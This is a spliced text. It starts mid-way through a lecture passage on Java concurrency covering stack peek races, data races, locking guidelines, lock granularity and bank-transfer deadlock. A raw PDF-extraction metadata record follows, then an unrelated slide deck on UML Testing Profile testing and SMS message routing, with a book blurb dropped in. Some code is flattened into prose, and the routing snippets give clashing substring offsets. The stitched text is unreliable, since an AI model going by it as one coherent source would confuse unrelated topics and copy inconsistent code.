// Thread 2
push(x)
boolean b = isEmpty()
```

**Example 2: peek and push**

- **Property we want:** Values are returned from `pop` in LIFO order.
- With `peek` as written, the property can be violated – how?

```java
// Thread 1 (peek)
E ans = pop();
push(ans);
return ans;

// Thread 2
push(x)
push(y)
E e = pop()
```

Example 3: peek and pop

- **Property we want**: Values are returned from `pop` in LIFO order
- With `peek` as written, the property can be violated – how?

```java
// Thread 1 (peek)
E ans = pop();
push(ans);
return ans;

// Thread 2
push(x)
push(y)
E e = pop()
```

Example 4: peek and peek

- **Property we want:** `peek` doesn’t throw an exception unless the stack is empty
- With `peek` as written, the property can be violated – how?

```java
// Thread 1 (peek)
E ans = pop();
push(ans);
return ans;

// Thread 2 (peek)
E ans = pop();
push(ans);
return ans;
```

The fix

• In short, **peek** needs synchronization to disallow interleavings
  – The key is to make a *larger critical section*
• That intermediate state of **peek** needs to be protected
  – Use re-entrant locks; this will allow the nested calls to **push** and **pop**
  – The second snippet below is an example of a **peek** external to the **Stack** class

```java
public class Stack<E> {
  ...
  synchronized E peek() {
    E ans = pop();
    push(ans);
    return ans;
  }
}
```

```java
public class C {
  <E> E myPeek(Stack<E> s) {
    synchronized (s) {
      E ans = s.pop();
      s.push(ans);
      return ans;
    }
  }
}
```

The wrong “fix”

• **Focus so far**: problems from `peek` doing writes that lead to an incorrect intermediate state
• **Tempting but wrong**: If an implementation of `peek` (or `isEmpty`) does not write anything, then maybe we can skip the synchronization?
• Does not work due to **data races** with `push` and `pop`...

class Stack<E> { private E[] array = (E[])new Object[SIZE]; private int index = -1; boolean isEmpty() { // unsynchronized: wrong?! return index == -1; } synchronized void push(E val) { array[++index] = val; } synchronized E pop() { return array[index--]; } E peek() { // unsynchronized: wrong!
return array[index]; } } **Why wrong?** - It *looks like* `isEmpty` and `peek` can “get away with this” since `push` and `pop` adjust the state “in one tiny step” - But this code is still *wrong* and depends on language-implementation details you cannot assume - Even “tiny steps” may require multiple steps in the implementation: `array[++index] = val` probably takes at least two steps - Code has a *data race*, allowing very strange behavior - Compiler optimizations may break it in ways you had not anticipated - See Grossman notes for more details - Moral: Do not introduce a *data race*, even if every interleaving you can think of is correct The distinction The (poor) term “race condition” can refer to two different things resulting from lack of synchronization: 1. **Data races**: Simultaneous read/write or write/write of the same memory location - (for mortals) **always** an error, due to compiler & hardware - Original *peek* example has no data races 2. **Bad interleavings**: Despite lack of data races, exposing bad intermediate state - “Bad” depends on your specification - Original *peek* had several bad interleavings Getting it right Avoiding race conditions on shared resources is difficult - What ‘seems fine’ in a sequential world can get you into trouble when multiple threads are involved - Decades of bugs have led to some conventional wisdom: general techniques that are known to work Next we discuss this conventional wisdom! - Parts paraphrased from “Java Concurrency in Practice” - Chapter 2 (rest of book more advanced) - But none of this is specific to Java or a particular book! - May be hard to appreciate in beginning, but come back to these guidelines over the years! 3 choices For every memory location (e.g., object field) in your program, you must obey at least one of the following: 1. Thread-local: Do not use the location in > 1 thread 2. Immutable: Do not write to the memory location 3. Shared-and-mutable: Use synchronization to control access to the location 1. Thread-local Whenever possible, do not share resources - Easier to have each thread have its own **thread-local copy** of a resource than to have one with shared updates - This is correct only if threads do not need to communicate through the resource - That is, multiple copies are a correct approach - Example: `Random` objects - Note: Because each call-stack is thread-local, never need to synchronize on local variables _In typical concurrent programs, the vast majority of objects should be thread-local: shared-memory should be rare – minimize it_ 2. Immutable Whenever possible, do not update objects - Make new objects instead! - One of the key tenets of *functional programming* (see CSE 341) - Generally helpful to avoid *side-effects* - Much more helpful in a concurrent setting - If a location is only read, never written, then no synchronization is necessary! - Simultaneous reads are *not* races and *not* a problem *In practice, programmers usually over-use mutation – minimize it* 3. The rest: Keep it synchronized After minimizing the amount of memory that is (1) thread-shared and (2) mutable, we need guidelines for how to use locks to keep other data consistent **Guideline #0:** No data races - *Never allow two threads to read/write or write/write the same location at the same time* (use locks!) 
- Even if it ‘seems safe’

**Necessary:**
- a Java or C program with a data race is almost always wrong

*But not sufficient:* Our peek example had no data races, and it’s still wrong…

Consistent Locking

**Guideline #1:** Use consistent locking
- For each location needing synchronization, have a lock that is *always* held when reading or writing the location
- We say the lock *guards* the location
- The same lock can (and often should) guard multiple locations (e.g., multiple fields in a class)
- Clearly document the guard for each location
- In Java, often the guard is the object containing the location
  - `this` inside the object’s methods
  - But we also often guard a larger structure with one lock to ensure mutual exclusion on the structure

Consistent Locking (continued)

• The mapping from locations to guarding locks is conceptual
  – Must be enforced by you as the programmer
• It partitions the shared-and-mutable locations into “which lock”

Consistent locking is:
• Not sufficient: It prevents all data races but still allows bad interleavings
  – Our peek example used consistent locking, but still had exposed intermediate states (and allowed potential bad interleavings)
• (Aside) Not necessary: You could have different locking protocols for different phases of your program, as long as all threads are coordinated when moving from one phase to the next. E.g., at the start of the program the data structure is being updated (needs locks); later it is not modified, so it can be read simultaneously (no locks).

Lock granularity

Coarse-grained: Fewer locks, i.e., more objects per lock
– Example: One lock for entire data structure (e.g., array)
– Example: One lock for all bank accounts

Fine-grained: More locks, i.e., fewer objects per lock
– Example: One lock per data element (e.g., array index)
– Example: One lock per bank account

“Coarse-grained vs. fine-grained” is really a continuum

Trade-offs

Coarse-grained advantages:
- Simpler to implement
- Faster/easier to implement operations that access multiple locations (because all guarded by the same lock)
- Much easier for operations that modify data-structure shape

Fine-grained advantages:
- More simultaneous access (performance when coarse-grained would lead to unnecessary blocking)

Fine-grained drawback:
- Multi-node operations become more difficult – say, rotations in an AVL tree

Guideline #2: Start with coarse-grained (simpler) and move to fine-grained (performance) only if contention on the coarser locks becomes an issue.

Example: Separate Chaining Hashtable
- Coarse-grained: One lock for the entire hashtable
- Fine-grained: One lock for each bucket (a sketch follows below)

Which supports more concurrency for insert and lookup? Which makes implementing resize easier?
- How would you do it?

If a hashtable has a numElements field, maintaining it will destroy the benefits of using separate locks for each bucket. Why?

**Critical-section granularity**

A second, orthogonal granularity issue is critical-section size
– How much work to do while holding lock(s)?
– What if critical sections run for too long?
– What if critical sections are too short?
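Before the critical-section examples below, here is a minimal sketch of the per-bucket idea referenced above. It is not from the lecture: the class and names (BucketLockedTable, NUM_BUCKETS) are illustrative assumptions, and resizing and error handling are omitted.

```java
import java.util.LinkedList;

// Sketch only: a fixed-size separate-chaining table with one lock object per bucket.
public class BucketLockedTable<K, V> {
    private static final int NUM_BUCKETS = 64;

    private static class Entry<K, V> {
        final K key; V value;
        Entry(K key, V value) { this.key = key; this.value = value; }
    }

    // locks[i] guards buckets[i] -- document the guard, per Guideline #1
    private final Object[] locks = new Object[NUM_BUCKETS];
    private final LinkedList<Entry<K, V>>[] buckets;

    @SuppressWarnings("unchecked")
    public BucketLockedTable() {
        buckets = (LinkedList<Entry<K, V>>[]) new LinkedList[NUM_BUCKETS];
        for (int i = 0; i < NUM_BUCKETS; i++) {
            locks[i] = new Object();
            buckets[i] = new LinkedList<>();
        }
    }

    private int bucketOf(K key) {
        return (key.hashCode() & 0x7fffffff) % NUM_BUCKETS;
    }

    public void insert(K key, V value) {
        int b = bucketOf(key);
        synchronized (locks[b]) {   // threads hitting different buckets do not block each other
            for (Entry<K, V> e : buckets[b]) {
                if (e.key.equals(key)) { e.value = value; return; }
            }
            buckets[b].add(new Entry<>(key, value));
        }
    }

    public V lookup(K key) {
        int b = bucketOf(key);
        synchronized (locks[b]) {
            for (Entry<K, V> e : buckets[b]) {
                if (e.key.equals(key)) return e.value;
            }
            return null;
        }
    }
}
```

Two threads working on keys that hash to different buckets never contend. A shared numElements counter (or a resize) would have to be guarded by something every operation touches, which is exactly where the fine-grained benefit erodes.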
– Example 1: Critical-section granularity Suppose we want to change the value for a key in a hashtable without removing it from the table - Assume lock guards the whole table - expensive() takes in the old value, and computes a new one, but takes a long time ```java synchronized(lock) { v1 = table.lookup(k); v2 = expensive(v1); table.remove(k); table.insert(k,v2); } ``` Example 2: Critical-section granularity Suppose we want to change the value for a key in a hashtable without removing it from the table - Assume lock guards the whole table ```java synchronized (lock) { v1 = table.lookup(k); } v2 = expensive(v1); synchronized (lock) { table.remove(k); table.insert(k, v2); } ``` Example 3: Critical-section granularity Suppose we want to change the value for a key in a hashtable without removing it from the table - Assume lock guards the whole table ```java done = false; while (!done) { synchronized (lock) { v1 = table.lookup(k); } v2 = expensive(v1); synchronized (lock) { if (table.lookup(k) == v1) { done = true; // I can exit the loop! table.remove(k); table.insert(k, v2); } } } ``` Atomicity An operation is *atomic* if no other thread can see it partly executed – Atomic as in “appears indivisible” – Typically want ADT operations atomic, even to other threads running operations on the same ADT **Guideline #4:** *Think in terms of what operations need to be atomic* – Make critical sections just long enough to preserve atomicity – *Then* design the locking protocol to implement the critical sections correctly *That is:* *Think about atomicity first and locks second* Don’t roll your own • In “real life”, it is unusual to have to write your own data structure from scratch – Implementations provided in standard libraries – Point of CSE332 is to understand the key trade-offs, abstractions, and analysis of such implementations • Especially true for concurrent data structures – Far too difficult to provide fine-grained synchronization without race conditions – Standard thread-safe libraries like ConcurrentHashMap written by world experts Guideline #5: Use built-in libraries whenever they meet your needs Deadlock Motivating Deadlock Issues Consider a method to transfer money between bank accounts ```java class BankAccount { ... synchronized void withdraw(int amt) {...} synchronized void deposit(int amt) {...} synchronized void transferTo(int amt, BankAccount a) { this.withdraw(amt); a.deposit(amt); } } ``` Potential problems? Motivating Deadlock Issues Consider a method to transfer money between bank accounts ```java class BankAccount { ... 
  synchronized void withdraw(int amt) {...}
  synchronized void deposit(int amt) {...}
  synchronized void transferTo(int amt, BankAccount a) {
    this.withdraw(amt);
    a.deposit(amt);
  }
}
```

Notice that during the call to `a.deposit`, the thread holds two locks
- Need to investigate when this may be a problem

The Deadlock

Suppose `x` and `y` are static fields holding accounts

Thread 1: `x.transferTo(1, y)`
- acquire lock for `x`
- do withdraw from `x`
- block on lock for `y`

Thread 2: `y.transferTo(1, x)`
- acquire lock for `y`
- do withdraw from `y`
- block on lock for `x`

**Ex: The Dining Philosophers**
- 5 philosophers go out to dinner together at an Italian restaurant
- Sit at a round table; one fork per setting
- When the spaghetti comes, each philosopher proceeds to grab their right fork, then their left fork, then eats
- ‘Locking’ for each fork results in a **deadlock**

Deadlock, in general

A deadlock occurs when there are threads $T_1, \ldots, T_n$ such that:
- For $i = 1, \ldots, n-1$, $T_i$ is waiting for a resource held by $T_{i+1}$
- $T_n$ is waiting for a resource held by $T_1$

In other words, there is a cycle of waiting
- Can formalize this as a graph of dependencies, where cycles are bad

Deadlock avoidance in programming amounts to techniques to ensure a cycle can never arise

Back to our example

Options for deadlock-proof transfer:

1. Make a smaller critical section: `transferTo` not synchronized
   - Exposes intermediate state after `withdraw` before `deposit`
   - May be okay here, but exposes wrong total amount in bank
2. Coarsen lock granularity: one lock for all accounts allowing transfers between them
   - Works, but sacrifices concurrent deposits/withdrawals
3. Give every bank account a unique number and always acquire locks in the same order
   - *Entire program* should obey this order to avoid cycles
   - Code acquiring only one lock can ignore the order

```java
class BankAccount {
  ...
  private int acctNumber; // must be unique
  void transferTo(int amt, BankAccount a) {
    if (this.acctNumber < a.acctNumber) {
      synchronized(this) {
        synchronized(a) {
          this.withdraw(amt);
          a.deposit(amt);
        }
      }
    } else {
      synchronized(a) {
        synchronized(this) {
          this.withdraw(amt);
          a.deposit(amt);
        }
      }
    }
  }
}
```

Aside: Another example – StringBuffer

From the Java standard library

class StringBuffer { private int count; private char[] value; ...
synchronized append(StringBuffer sb) { int len = sb.length(); if(this.count + len > this.value.length) this.expand(...); sb.getChars(0, len, this.value, this.count); } synchronized getChars(int x, int y, char[] a, int z) { "copy this.value[x..y] into a starting at z" } } Aside: Two problems with StringBuffer Problem #1: Lock for sb is not held between calls to sb.length and sb.getChars – So sb could get longer – Would cause append to throw an ArrayBoundsException Problem #2: Deadlock potential if two threads try to append in opposite directions, just like in the bank-account first example Not easy to fix both problems without extra copying: – Do not want unique ids on every StringBuffer – Do not want one lock for all StringBuffer objects Actual Java library: fixed neither (left code as is; changed javadoc) – Up to clients to avoid such situations with own protocols Perspective • Code like account-transfer and string-buffer append are difficult to deal with for deadlock • Easier case: different types of objects – Can document a fixed order among types – Example: “When moving an item from the hashtable to the work queue, never try to acquire the queue lock while holding the hashtable lock” • Easier case: objects are in an acyclic structure – Can use the data structure to determine a fixed order – Example: “If holding a tree node’s lock, do not acquire other tree nodes’ locks unless they are children in the tree” Concurrency summary - Concurrent programming allows multiple threads to access shared resources (e.g., hash table, work queue) - Introduces new kinds of bugs: - Data races and Bad Interleavings - Critical sections too small - Critical sections use wrong locks - Deadlocks - Requires synchronization - Locks for mutual exclusion (common, various flavors) - Other Synchronization Primitives: (see Grossman notes) - Reader/Writer Locks - Condition variables for signaling others - Guidelines for correct use help avoid common pitfalls - Shared Memory model is not only approach, but other approaches (e.g., message passing) are not painless
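To close the loop on Guideline #5 and on Example 3 above, here is a hedged sketch (not from the lecture) of the same check-then-swap retry, but letting java.util.concurrent supply the atomic steps instead of hand-written synchronized blocks. The expensive() body is a stand-in.

```java
import java.util.concurrent.ConcurrentHashMap;

public class LibraryRetrySketch {
    private final ConcurrentHashMap<String, Integer> table = new ConcurrentHashMap<>();

    // Stand-in for a slow recomputation of the value; deliberately kept outside any lock.
    private Integer expensive(Integer old) {
        return (old == null) ? 1 : old + 1;
    }

    public void update(String key) {
        while (true) {
            Integer v1 = table.get(key);   // read without holding any explicit lock
            Integer v2 = expensive(v1);    // long computation happens outside critical sections
            if (v1 == null) {
                if (table.putIfAbsent(key, v2) == null) return;   // inserted first, done
            } else if (table.replace(key, v1, v2)) {
                return;                    // nobody changed the value in the meantime
            }
            // another thread won the race: re-read, recompute, and try again
        }
    }

    public static void main(String[] args) throws InterruptedException {
        LibraryRetrySketch sketch = new LibraryRetrySketch();
        Runnable worker = () -> { for (int i = 0; i < 10_000; i++) sketch.update("counter"); };
        Thread t1 = new Thread(worker);
        Thread t2 = new Thread(worker);
        t1.start(); t2.start();
        t1.join(); t2.join();
        System.out.println(sketch.table.get("counter"));   // prints 20000: no lost updates
    }
}
```

The design point matches Guideline #5: ConcurrentHashMap already provides these atomic building blocks, written by experts, so the hand-rolled lock-per-table dance is often unnecessary.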
{"Source-Url": "https://courses.cs.washington.edu/courses/cse332/18au/lectures/cse332-18au-lec18-Concurrency-2.pdf", "len_cl100k_base": 4767, "olmocr-version": "0.1.53", "pdf-total-pages": 46, "total-fallback-pages": 0, "total-input-tokens": 68584, "total-output-tokens": 6664, "length": "2e12", "weborganizer": {"__label__adult": 0.0003724098205566406, "__label__art_design": 0.0002980232238769531, "__label__crime_law": 0.0004410743713378906, "__label__education_jobs": 0.0024318695068359375, "__label__entertainment": 6.127357482910156e-05, "__label__fashion_beauty": 0.0001348257064819336, "__label__finance_business": 0.00013399124145507812, "__label__food_dining": 0.0004189014434814453, "__label__games": 0.0006284713745117188, "__label__hardware": 0.0006527900695800781, "__label__health": 0.00045108795166015625, "__label__history": 0.00024306774139404297, "__label__home_hobbies": 0.0001067519187927246, "__label__industrial": 0.0004508495330810547, "__label__literature": 0.00025200843811035156, "__label__politics": 0.00033783912658691406, "__label__religion": 0.0006237030029296875, "__label__science_tech": 0.00722503662109375, "__label__social_life": 0.00012993812561035156, "__label__software": 0.0030384063720703125, "__label__software_dev": 0.97998046875, "__label__sports_fitness": 0.0004546642303466797, "__label__transportation": 0.0007233619689941406, "__label__travel": 0.0002359151840209961}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20199, 0.00586]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20199, 0.5701]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20199, 0.8412]], "google_gemma-3-12b-it_contains_pii": [[0, 105, false], [105, 430, null], [430, 1117, null], [1117, 1398, null], [1398, 1985, null], [1985, 2383, null], [2383, 2798, null], [2798, 3165, null], [3165, 3722, null], [3722, 4011, null], [4011, 4246, null], [4246, 4508, null], [4508, 4813, null], [4813, 5528, null], [5528, 5850, null], [5850, 6257, null], [6257, 6896, null], [6896, 7400, null], [7400, 7971, null], [7971, 8274, null], [8274, 8838, null], [8838, 9291, null], [9291, 9803, null], [9803, 10382, null], [10382, 11135, null], [11135, 11527, null], [11527, 12110, null], [12110, 12487, null], [12487, 12717, null], [12717, 13107, null], [13107, 13436, null], [13436, 13931, null], [13931, 14425, null], [14425, 14978, null], [14978, 14987, null], [14987, 15378, null], [15378, 15831, null], [15831, 16106, null], [16106, 16416, null], [16416, 16832, null], [16832, 17435, null], [17435, 17870, null], [17870, 18349, null], [18349, 18974, null], [18974, 19541, null], [19541, 20199, null]], "google_gemma-3-12b-it_is_public_document": [[0, 105, true], [105, 430, null], [430, 1117, null], [1117, 1398, null], [1398, 1985, null], [1985, 2383, null], [2383, 2798, null], [2798, 3165, null], [3165, 3722, null], [3722, 4011, null], [4011, 4246, null], [4246, 4508, null], [4508, 4813, null], [4813, 5528, null], [5528, 5850, null], [5850, 6257, null], [6257, 6896, null], [6896, 7400, null], [7400, 7971, null], [7971, 8274, null], [8274, 8838, null], [8838, 9291, null], [9291, 9803, null], [9803, 10382, null], [10382, 11135, null], [11135, 11527, null], [11527, 12110, null], [12110, 12487, null], [12487, 12717, null], [12717, 13107, null], [13107, 13436, null], [13436, 13931, null], [13931, 14425, null], [14425, 14978, null], [14978, 14987, null], [14987, 15378, null], [15378, 15831, null], 
[15831, 16106, null], [16106, 16416, null], [16416, 16832, null], [16832, 17435, null], [17435, 17870, null], [17870, 18349, null], [18349, 18974, null], [18974, 19541, null], [19541, 20199, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20199, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20199, null]], "pdf_page_numbers": [[0, 105, 1], [105, 430, 2], [430, 1117, 3], [1117, 1398, 4], [1398, 1985, 5], [1985, 2383, 6], [2383, 2798, 7], [2798, 3165, 8], [3165, 3722, 9], [3722, 4011, 10], [4011, 4246, 11], [4246, 4508, 12], [4508, 4813, 13], [4813, 5528, 14], [5528, 5850, 15], [5850, 6257, 16], [6257, 6896, 17], [6896, 7400, 18], [7400, 7971, 19], [7971, 8274, 20], [8274, 8838, 21], [8838, 9291, 22], [9291, 9803, 23], [9803, 10382, 24], [10382, 11135, 25], [11135, 11527, 26], [11527, 12110, 27], [12110, 12487, 28], [12487, 12717, 29], [12717, 13107, 30], [13107, 13436, 31], [13436, 13931, 32], [13931, 14425, 33], [14425, 14978, 34], [14978, 14987, 35], [14987, 15378, 36], [15378, 15831, 37], [15831, 16106, 38], [16106, 16416, 39], [16416, 16832, 40], [16832, 17435, 41], [17435, 17870, 42], [17870, 18349, 43], [18349, 18974, 44], [18974, 19541, 45], [19541, 20199, 46]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20199, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
5ba8dbfa75861dcdc09a353f029474ccc0f1e372
More Testing with U2TP
... and more on routing
... and a few other things

Version 091113, ICU 6-9

Testing is …
- A technical process
- Performed by experimenting with a system
- In a controlled environment following a specified procedure
- With the intent of observing one or more characteristics of the system
- By demonstrating the deviation of the system’s actual status from the required status/specification.

Buzz 1: Why Model-driven Testing?
- Spend 2 minutes with one person beside you
- List reasons in favor of and against model-driven testing
  - write your reasons down on a piece of paper
  - we shall come back to your reasons somewhat later
- This will probably reveal your prejudices of what model-driven testing is and can be used for

Types of Testing
- Level: unit, integration, acceptance, …
- Accessibility: white box, grey box, black box
- Aspects: functionality, load/performance, robustness, interoperability, usability, …

UML Testing Profile
- To allow **black-box testing** (i.e. at UML interfaces) of computational models in UML
- A testing profile based upon UML 2.0
- That enables the **test definition and test generation** based on structural (static) and behavioral (dynamic) aspects of UML models, and
- That is capable of **inter-operation with existing test technologies** for black-box testing
- Standardized profile recommended by OMG

Model-Driven Testing

Model-driven development has become the most important new paradigm in software development and has already demonstrated considerable impact in reducing time-to-market and improving product quality. However, the development of high-quality systems still relies on the more traditional development processes and also on systematic test processes. This book is about systematic, model-driven test processes in the context of UML. As a UML profile, UTP provides a consistent view of the design and development of test artifacts; the concept was formed by the Object Management Group (OMG), which developed a UML profile for model-driven testing – the UML Testing Profile (UTP), an OMG standard from 2005. Written by the original members of the standardization group, this book shows you how to test using its comprehensive concepts. The authors introduce UTP step-by-step, using a case study that illustrates how UTP can be used for test-driven design and development. They also show that UTP concepts can be used for functional and non-functional testing, with example applications and test suites for better comprehension and easy practical application to different systems. The authors demonstrate how to apply UTP with existing testing tool frameworks (TBB 3.0 and the UML test framework). This book is the definitive reference for the only UML-based test specification language, written by the creators of that language. It is supported by an Internet site that provides information on the latest tools and support of the profile.
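To make the black-box vocabulary concrete before the slides that follow, here is a minimal, hypothetical Java sketch of the stimulus/response/verdict pattern. None of these classes (FakeSut, the Verdict enum) exist in UTP or in the ICU system; the SMS strings are only borrowed from the later registration examples.

```java
// Minimal, hypothetical sketch of black-box testing: apply a stimulus through the SUT's
// interface (the "port"), observe the response, and assign a verdict.
public class BlackBoxSketch {

    enum Verdict { PASS, INCONCLUSIVE, FAIL }

    // Stand-in for the System Under Test, observed only through its interface.
    static class FakeSut {
        String sendSms(String message) {
            // A real SUT would be the deployed ICU system; this stub just echoes a reply.
            return message.contains("reg Oystein")
                    ? "Reg: you are registered as Oystein"
                    : "";
        }
    }

    // One test case: stimulus in, response out, verdict assigned.
    static Verdict testRegistration(FakeSut sut) {
        String response = sut.sendSms("Stud1 konto oystein reg Oystein");   // stimulus
        if (response.isEmpty()) return Verdict.INCONCLUSIVE;                // no observable response
        return response.startsWith("Reg: you are registered")              // expected response?
                ? Verdict.PASS
                : Verdict.FAIL;
    }

    public static void main(String[] args) {
        System.out.println(testRegistration(new FakeSut()));   // PASS for this stub
    }
}
```

In UTP terms, testRegistration plays the role of a test case inside a test context, FakeSut stands in for the SUT behind its port, and the returned enum is the verdict an arbiter would later combine with other verdicts.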
Features & Benefits
- Learn how to create and use model-driven testing processes
- Use a step-by-step methodology to develop the UML Testing Profile for your organization
- Experience test-driven design in the use of UML for different perspectives of testing
- Understand the automated generation of UML-based tests with testing tool frameworks like TBB 3.0 and TBB 4.0
- Find additional material at: model-driven.org

Test Concepts: Black-Box Testing
- Test Context
- Test Case
- Stimulus
- Response
- Assignment of a Test Verdict
- System Under Test (SUT)
- Port

Test Execution
- Test Harness / Test execution platform – machine-based or human-based
- Compilation or human interpretation

Unit Level Testing
- For unit level testing, the SUT is the smallest unit, e.g. a class or an operation, which is to be tested.

System and Acceptance Level Testing
- The goal of system level testing is to verify that the system under test conforms to its requirements.
- Acceptance testing is basically an extension of system testing in which requirements and the test cases associated with validating them are developed by or with the customer(s) and are considered to be contractual descriptions of the required system behavior.

ICU5 system test context
- Test cases: testHotpos(), testHotpos_fail(), testHotpos_inconcr()
- Test components: Oystein : CellPhone, Trine : CellPhone
- System Under Test: ICU (in ICUTestPackage, which imports the definition of the system)
- Test configuration: SMSin : SmsInputMediator = ARG5[0], ARG5[0]; SMSout : SmsOutputMediator = ARG5[0], ARG5[0]

Test control problems
- How to enforce the desired sequence?
- Each test case produces its own verdict – how are they combined?

Arbitration
- One *fail* is normally enough to force a *fail* test case
- *pass, inconclusive, fail* is ordered such that the least value is the final resulting verdict
- Arbitration can also be defined by the user
  - possibly one single *fail* should not suffice to force a full failure
- When to determine the verdict? E.g., there is just no response to Trine’s Sms stimulus

Test strategy – acceptance test
- validate that the functionality of the system is correct with respect to the requirements
- validate the non-functional (extra-functional) properties
  - Performance testing – to see if a system can meet its expected response times under typical workloads
  - Load testing – to determine whether the system suffers from resource problems (memory leaks, buffer problems) or otherwise undergoes degradation
  - Stress testing – to determine how gracefully it may recover from extreme situations
  - Reliability – the probability of correct operation of a piece of software for a specified amount of time
- validate that the supported software distribution and deployment configurations are correctly supported

Buzz 2: Testing strategy – advanced tests (Buzz 5 min)
- Challenges
  - How to test systems that have non-deterministic behavior?
- due to concurrency - How to test time requirements - test probes changes the timing of the system - How to simulate extreme load situations - 1 million SMS-messages within a minute Dynamic Data (still transient) Signal hierarchies Combined Fragments of Sequence Diagram Register users Associate the nickname "haugen" with the static id "STAT-ID" decompose for detailed specification combined fragment: alternative even though we may describe alternative execution traces, we are not obliged to describe them all! Register users - decomposition extra-global combined fragment: alternative more signals defined by the designer Effect on routing (1) common abstract signal with routing info Effect on routing (2) - **Type of signal** - ![Diagram of signal types with routing information](image) - **Effect on routing** - Abstract signal with routing info - **Code snippet** ```java /* Sms */ String string = ((Sms)(sig)).getFrom(); /* PostResult */ String string = ((PostResult)(sig)).getPostResult(); int i = the_string.indexOf("<STATICID="); string = the_string.substring(i, i+18); /* InternalSignal */ String string = ((InternalSignal)(sig)).static_id; for (int i = 0; i < mediator.size(); i++) { if (string.equals(mediator.get(i))) ((Mediator)mediator.get(i)).forward(sig); } ``` Repeating our simple composite structure ``` ICU_system SMS_in : SmsInputMediator = ARG[0], ARG[1] contr : ICUcontroller from_dataproc to_ICUproc : SimpleIDRouter icu_proc : ICUprocess [*] to_dataproc from_ICUproc SMS_out : SmsOutputMediator = ARG[0], ARG[1] dataproc : Archive to_contr ``` the receptionist the sessions the data Adding a new service is no sweat! just add another submachine state The new state machine significant work is left to the Archive process The Archive process enhanced our new input to the Archive Check registration transition - If the static ID already exists: - Check if static ID already exists. - If it exists, send our own defined message about it. - Include the new user in table. - If the nickname already exists: - Check if nickname already exists. - If it exists, send our own defined message about it. - Include the new user in table. - If no static ID or nickname exists, register the user. Write down the names of these UML concepts a) Interaction [Frame, Sequence Diagram] b) Lifeline c) Combined fragment [alt-fragment] d) Message e) Gate Check consistency with spec! Summary of adding the *reg* service - Specify what the new service is supposed to do - use case in prose - sequence diagrams on context and detailed levels - Define necessary internal signals - make sure routing will be performed properly - Define a new submachine state in the session process - Define the corresponding state machine - this may involve the data process - add new transitions with new data operations - Notice that the old system is hardly changed! - there are only additions - Check the consistency between specification and design On Routing - and a few other lessons Lessons to be learned now - Small changes to the user’s specification may result in rather far reaching effects on the software - 3rd party software interface can be quite important - Routing can be done several ways - Agile modeling normally involves re-engineering – that sometimes may become rather fundamental Hotpos – as of ICU6 - Only ask `hotpos` - Returning the position of the user relative to the hotspots Hotpos – as of ICU7 – a minor change? 
- Only hotpos is as before
- **hotpos nickname** should give the position of the person registered with the nickname relative to the user’s hotspots
- What could possibly be the problem?
- Let us look at the decomposition!
  - We need STAT-ID for routing! The static id of the user and the static id of the buddy (STAT-TR) are not the same.

Routing PosResult in ICU6

```java
/* Sms */
static_id = ((Sms) sig).getFrom();

/* PosResult */
String the_string = ((PosResult) sig).getPositioningResult();
int ix = the_string.indexOf("<STATICID>");
static_id = the_string.substring(ix+10, ix+13);
```

The substring extracted here is the static id of the GSM having been positioned.

The problem
- We want PosResult to be routed according to STAT-ID
  - STAT-ID is the static id of the user, which identifies the session
- PosResult returns an XML string which includes the static id of the positioned GSM
  - which is no longer identical to the user!
- PosResult is a message not defined by you, but in principle by a third party
  - which means you cannot change the interface!
- We need to take a closer look at the SMSMediator interface!

PosResult – the javadoc (1/2)

Package smmediators, class PosResult
- java.lang.Object → se.ericsson.eto.norarc.javframe.Message → smmediators.PosResult
- All Implemented Interfaces: java.lang.Cloneable
- public class PosResult extends se.ericsson.eto.norarc.javframe.Message
- Description: Object representing a Positioning result
- Field Summary: fields inherited from class se.ericsson.eto.norarc.javframe.Message – nextMessage
- Constructor Summary: PosResult(java.lang.String positioningResult, java.lang.String messageId) – Constructor for positioning requests
- We have used the first parameter – could we benefit from the second?

PosResult – the javadoc (2/2)

Constructor Detail

```
public PosResult(String positioningResult, String messageId)
```

Constructor for positioning requests

**Parameters:**
- `positioningResult`: the phone/person you want to locate
- `messageId`: a unique identifier for the message

Method Detail

**getMessageId**

```
public String getMessageId()
```

**Returns:**
- Returns the messageId.

**setMessageId**

```
public void setMessageId(String messageId)
```

**Parameters:**
- `messageId`: The messageId to set.

Exploring the SMSMediator interface
- When the documentation is less than satisfactory (and it always is), one has to experiment with the interface.
- We hypothesize that PATS have had the same need to tag the communication as we have:
  - thus we hope that the `messageId` of `PosRequest` (which we can choose) is returned as the `messageId` of the corresponding `PosResult`.
- Through experimentation we assert that this is indeed the case!

Hotpos submachine
- The adapted `forward` does the routing – the session id is now very readily available (a sketch follows below).

More on the problems of routing
... just to get a feeling for what is normally behind the scenes

The receptionist-session-archive architecture

The routing domain explicitly connects to the sessions, which connect to the router and the data. Specifically:
- The router is connected to the routing domain.
- The data is connected to the router through `to_contr`.
- The sessions are connected to the router through `to_icuproc`.
- The sessions explicitly connect to the singular archive.

The diagram illustrates the connections and flows between the router, sessions, data, and the ICU system.
